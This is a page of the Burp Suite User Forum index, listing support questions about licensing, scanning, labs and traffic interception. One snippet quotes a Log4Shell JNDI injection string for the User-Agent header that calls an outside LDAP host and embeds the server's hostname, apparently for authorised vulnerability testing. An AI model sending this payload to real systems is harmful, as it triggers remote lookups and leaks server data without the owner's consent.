Burp Suite User Forum

Create new post

Get certificate from unlicensed burp jar

Hi, Recently I renewed my license for Burp Professional, with the new license, the Burp certificate changed. A lot of my clients added the old certificate into the android application for testing purposes so I don’t have...

Last updated: Jan 04, 2022 02:26PM UTC | 4 Agent replies | 4 Community replies | How do I?

Also unable to intercept Terminal http requests

Hello, I've seen some posts on the forum about intercepting terminal traffic. I am also using macOS and unable to do it. Help please.

Last updated: Jan 04, 2022 01:57PM UTC | 3 Agent replies | 2 Community replies | How do I?

BURP Scan login to portal

I have a license Professional BURP Suite. I want to scan a website consider xyz.com the home page of xyz.com is nothing but a Log In page with label button as "GET STARTED" I have mentioned this in "Application Login"...

Last updated: Jan 04, 2022 01:35PM UTC | 1 Agent replies | 0 Community replies | How do I?

Burp Suite Pro, on 1920 x1080 with 150% scale displaying blurry

I recently purchased a yoga 6 with Windows 11 built-in and trying to run Burp suite pro, but the default scale display of the laptop is 150% and burp displays blurry. If i change the scale to 100% is displays okay however...

Last updated: Jan 04, 2022 11:11AM UTC | 1 Agent replies | 0 Community replies | How do I?

No more activations allowed for this license

Dear Team, I'm facing No more activations allowed for this license, kindly check and do the needful. Find the below information may be required for you. License Email: prasannakumar.v@nelito.com Currently Licensed not...

Last updated: Jan 04, 2022 10:48AM UTC | 1 Agent replies | 0 Community replies | How do I?

2FA Broken logic lab issue

Know i see the video which is come with 2FA broken logic lab and i do what exaclty the instructor do but the 10000 requests to hack the msf-code not any of them are 302 , it's all 200 response code when i set verfiy value in...

Last updated: Jan 04, 2022 09:37AM UTC | 1 Agent replies | 0 Community replies | How do I?

Cannot download Burp Community Edition

I've tried multiple versions (https://portswigger.net/burp/releases), and even though the button turns gray, the file never downloads. All extensions disabled and no security software.

Last updated: Jan 04, 2022 09:10AM UTC | 1 Agent replies | 0 Community replies | How do I?

Burp Suite Response Render Issue - Embedded Browser Initialization Failed

Hi Team, I am running as root user on Kali and getting this error when viewing response render: Embedded Browser Initialization Failed It is mentioned in Burp Forum to perform the following steps to fix that issue:...

Last updated: Jan 04, 2022 08:52AM UTC | 2 Agent replies | 1 Community replies | How do I?

How do I import sitemap from export sitemap file?

The feature "Save selected items"[1] let user export every request and response paths that Burp know about a specific domain. How do I import the exported file back to Sitemap? [1]. Target > Sitemap > right-click on a...

Last updated: Jan 04, 2022 08:43AM UTC | 2 Agent replies | 2 Community replies | How do I?

REST API - OAuth 2.0

How do I capture the OAuth 2.0 information when performing the REST API security testing in Enterprise edition.

Last updated: Dec 31, 2021 10:18AM UTC | 1 Agent replies | 0 Community replies | How do I?

Delete my account

Hi, i want to delete my account.

Last updated: Dec 30, 2021 09:04AM UTC | 1 Agent replies | 0 Community replies | How do I?

SQL injection

How to identify bugs

Last updated: Dec 30, 2021 07:15AM UTC | 1 Agent replies | 1 Community replies | How do I?

Transfer User Licenses

Dear Support team, we bought 2 licenses of Burp Suite Professional with the help of CCP Software GmbH. The keys are now connected to an account of a collegue who is no longer working for us. How can we connect the...

Last updated: Dec 30, 2021 02:16AM UTC | 1 Agent replies | 2 Community replies | How do I?

my license has been used many times now is not working

Hello Support team happy new year i need to disable the old license and generate a new one in order to disable the old devices over the cloud thanks

Last updated: Dec 29, 2021 09:42AM UTC | 1 Agent replies | 0 Community replies | How do I?

burp collab client - Wont work properly

Hi there, I need help enabling burp collab client to work correctly. I do the health check and am not sure how to fix the problems that arise and i dont see full solutions online.

Last updated: Dec 29, 2021 08:27AM UTC | 1 Agent replies | 0 Community replies | How do I?

Bad Request in Web Academy labs..!!!!

Hi all, I'm totally new to web security want to learn web security and I've found out portswigger web labs. this is my first day starting to learn about websec. but, when I tried to access my first lab as suggested by...

Last updated: Dec 24, 2021 10:24AM UTC | 7 Agent replies | 9 Community replies | How do I?

How do I know if https requests are failing to be decrypted?

I am attempting to mitm an android emulator on my computer with burpsuite. I am able to see https traffic of insecure things like assets, but I see no traffic for data being posted to and from the app, over https. I know the...

Last updated: Dec 24, 2021 08:53AM UTC | 2 Agent replies | 3 Community replies | How do I?

Scanner does not honor match/replace rules

I have added a log4j match/replace rule on the User-Agent like this Match: ^User-Agent.*$ Replace: User-Agent: \${jndi:ldap://log4shell.huntress.com:1389/hostname=\${env:HOSTNAME}/guid} The rule works just fine when...

Last updated: Dec 23, 2021 08:09PM UTC | 1 Agent replies | 1 Community replies | How do I?

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

Hello everyone! Im having troubles with this lab. I tried even to follow the youtube videos to get with the solution and not even that helps. Im getting a 400 and {"error":"Invalid request"} I tried also to switch...

Last updated: Dec 23, 2021 12:43AM UTC | 4 Agent replies | 5 Community replies | How do I?

Digest Auth in Burp was removed?

Hi, What happened with Digest authentication support? https://portswigger.net/burp/documentation/desktop/options/connections "Supported authentication types are: basic, NTLMv1, and NTLMv2" In the previous versions...

Last updated: Dec 22, 2021 12:18PM UTC | 4 Agent replies | 5 Community replies | How do I?

Page 115 of 310

Burp Suite Support Center

Your source for help and advice on all things Burp-related.

Burp Suite Support Center image